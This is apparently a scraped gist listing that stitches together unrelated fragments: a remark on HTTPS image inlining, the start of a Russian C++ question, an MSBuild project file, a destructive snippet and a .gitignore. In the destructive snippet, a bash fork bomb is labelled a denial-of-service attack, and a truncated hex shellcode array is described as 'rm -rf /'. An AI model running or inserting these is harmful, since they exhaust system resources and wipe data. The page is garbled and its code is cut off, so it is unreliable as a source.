A long time ago, it was possible to inline images from all kinds of external sources. Since the switch from HTTP to HTTPS, this is no longer possible; only HTTPS sources are allowed. This leads to ugly blurbs like
instead of a nicely formatted page with images. Sometimes, the links don't even work anymore, even with HTTPS images, which will show like this: 
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Вот пример C++ кода, который выглядит очень странно. Почему-то, когда данные отсортированы код выполняется почти в шесть раз быстрее. | |
| <!-- language: lang-cpp --> | |
| #include <algorithm> | |
| #include <ctime> | |
| #include <iostream> | |
| int main() | |
| { |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="utf-8"?> | |
| <Project DefaultTargets="PrepareStaticContent" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
| <PropertyGroup> | |
| <!-- Passed in Parameters --> | |
| <configuration></configuration> | |
| <workingDir></workingDir> | |
| <buildNumber></buildNumber> | |
| <buildViews>false</buildViews> | |
| <minifyJs>true</minifyJs> | |
| <TargetsDirectory></TargetsDirectory> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Pretty much a denial of service attack, self replicates to use resources. | |
| :(){ :|: & };: | |
| # just rm -rf / in hex | |
| char esp[] __attribute__ ((section(“.text”))) /* e.s.p | |
| release */ | |
| = “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″ | |
| “\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″ | |
| “\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″ | |
| “\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Compiled source # | |
| ################### | |
| *.com | |
| *.class | |
| *.dll | |
| *.exe | |
| *.o | |
| *.so | |
| # Packages # |